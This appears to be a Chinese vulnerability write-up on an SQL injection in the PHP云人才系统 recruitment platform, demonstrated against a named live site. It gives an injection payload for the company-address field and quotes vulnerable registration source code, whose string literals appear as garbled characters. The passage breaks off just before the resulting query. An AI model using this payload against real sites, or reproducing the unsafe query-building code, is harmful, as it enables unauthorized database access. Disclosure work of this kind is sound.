PHP云人才系统SQL注入

摘要

http://www.hr135.com/index.php?m=register&usertype=2如下图： 点击立即注册，注册成功后进入"企业信息页面",可以看到数据显示在"公司地址"里面, 如下图：

漏洞作者： 龟兔赛跑

http://www.hr135.com/index.php?m=register&usertype=2

公司名称：錦 公司地址：,address=注入的SQL，这里用,address=concat(user(),0x0a,version())#

如下图：

 

点击立即注册，注册成功后进入"企业信息页面",可以看到数据显示在"公司地址"里面, 如下图：

 

对应的代码为：

model/register.class.php      function regsave_action(){            $_POST=$this->post_trim($_POST);            $_POST['username']=iconv("utf-8","gbk",$_POST['username']);                 $_POST['unit_name']=iconv("utf-8","gbk",$_POST['unit_name']);   // 这里对输入的‘錦’做了转化，引入了'/'             $_POST['address']=iconv("utf-8","gbk",$_POST['address']);            if(trim($_POST['password'])&&trim($_POST['password'])!=trim($_POST['passconfirm'])){                 echo "8##�����������벻һ�£�";die;             }             if(!$this->CheckRegUser($_POST['username'])){                 echo "8##�û������������ַ���";die;             }             if(!$this->CheckRegEmail($_POST['email'])){                 echo "8##Email��ʽ���淶��";die;             }             if($_COOKIE['uid']!=""&&$_COOKIE['username']!=""){                 echo "8##���Ѿ���¼�ˣ�";die;             }             $usertype=$_POST['usertype'];             if(strstr($this->config['code_web'],'ע����Ա')){                 if(md5($_POST['authcode'])!=$_SESSION['authcode']){                     echo "8##��֤��������";die;                 }             }             if($_POST['username']!=""){                 $nid = $this->obj->DB_select_once("member","`username`='".$_POST['username']."' or `email`='".$_POST['email']."'");                 if(is_array($nid)){                     echo "8##�˻����������Ѵ��ڣ�";die;                 }                 if($_POST['usertype']=='2'){                     if($this->config['com_enforce_mobilecert']!='1'){                         unset($_POST['moblie']);                     }                      $satus = $this->config['com_status'];                 }                 if($this->config['sy_uc_type']=="uc_center"){                     $this->obj->uc_open();                    $uid=uc_user_register($_POST['username'],$_POST['password'],$_POST['email']);                    if($uid<=0){                        echo "8##�������Ѵ��ڣ�";die;                    }else{                        list($uid,$username,$password,$email,$salt)=uc_user_login($_POST['username'],$_POST['password']);                        $pass = md5(md5($_POST['password']).$salt);                        $ucsynlogin=uc_user_synlogin($uid);                    }                }elseif($this->config['sy_pw_type']=="pw_center"){                    include(APP_PATH."/api/pw_api/pw_client_class_phpapp.php");                    $username=$username;                    $password=$_POST['password'];                    $email=$_POST['email'];                    $pw=new PwClientAPI($username,$password,$email);                    $pwuid=$pw->register();                    $salt = substr(uniqid(rand()), -6);                    $pass = md5(md5($password).$salt);                }else{                    $salt = substr(uniqid(rand()), -6);                    $pass = md5(md5($_POST['password']).$salt);                }                $ip = $this->obj->fun_ip_get();                $data['username']=$_POST['username'];                $data['password']=$pass;                $data['moblie']=$_POST['moblie'];                $data['email']=$_POST['email'];                $data['usertype']=$_POST['usertype'];                $data['status']=$satus;                $data['salt']=$salt;                $data['reg_date']=time();                $data['reg_ip']=$ip;                $data['qqid']=$_SESSION['qq']['openid'];                $data['sinaid']=$_SESSION['sinaid'];                $userid=$this->obj->insert_into("member",$data);                if(!$userid){                    $user_id = $this->obj->DB_select_once("member","`username`='".$_POST['username']."'","`uid`");                    $userid = $user_id['uid'];                }                if($userid){                    $this->unset_cookie();                    if($this->config[sy_pw_type]=="pw_center"){                        $this->obj->DB_update_all("member","`pwuid`='".$pwuid."'","`uid`='".$userid."'");                    }                    if($_POST['usertype']=="1"){                        $table = "member_statis";                        $table2 = "resume";                        $value="`uid`='".$userid."'";                        $value2 = "`uid`='".$userid."',`email`='".$_POST['email']."',`telphone`='".$_POST['moblie']."'";                    }elseif($_POST['usertype']=="2"){                        $table = "company_statis";                        $table2 = "company";                        $value="`uid`='".$userid."',".$this->rating_info();                        $value2 = "`uid`='".$userid."',`linkmail`='".$_POST['email']."',`name`='".$_POST['unit_name']."',`linktel`='".$_POST['moblie']."',`address`='".$_POST['address']."'"; // ********这里将转码引入的'/'带入SQL，$_POST['address']即可注入代码。                    }                    $this->obj->DB_insert_once($table,$value);                    $this->obj->DB_insert_once($table2,$value2);                    $this->obj->DB_insert_once("friend_info","`uid`='".$userid."',`nickname`='".$_POST['username']."',`usertype`='".$_POST['usertype']."'");                    if($_POST['usertype']=="1"){                        if($this->config['user_status']=="1"){                            $randstr=rand(10000000,99999999);                            $base=base64_encode($userid."|".$randstr."|".$this->config['coding']);                            $data_cert['type']="cert";                            $data_cert['email']=$_POST['email'];                            $data_cert['url']="<a href='".$this->config['sy_weburl']."/index.php?m=qqconnect&c=mcert&id=".$base."'>������֤</a>";                            $data_cert['date']=date("Y-m-d");                            $this->send_msg_email($data_cert);                            $msg = "7##�ʺż����ʼ��ѷ��͵������䣬���ȼ��";                        }else{                            $this->add_cookie($userid,$_POST['username'],$salt,$_POST['email'],$pass,$usertype);                            $this->regemail($_POST);                            $msg = 1;                        }                    }elseif($usertype=="2"){                        $this->regemail($_POST);                        if($this->config['com_status']!="1"){                            $msg = "7##ע���ɹ�,���ȴ�����Ա����";                        }else{                            $msg = 1;                            $this->add_cookie($userid,$_POST['username'],$salt,$_POST['email'],$pass,$usertype);                        }                    }                    echo $msg;die;                }else{                    echo "8##ע��ʧ�ܣ�";die;                }            }else{                echo "8##�û�������Ϊ�գ�";die;            }        }

这样拼接出的SQL语句为：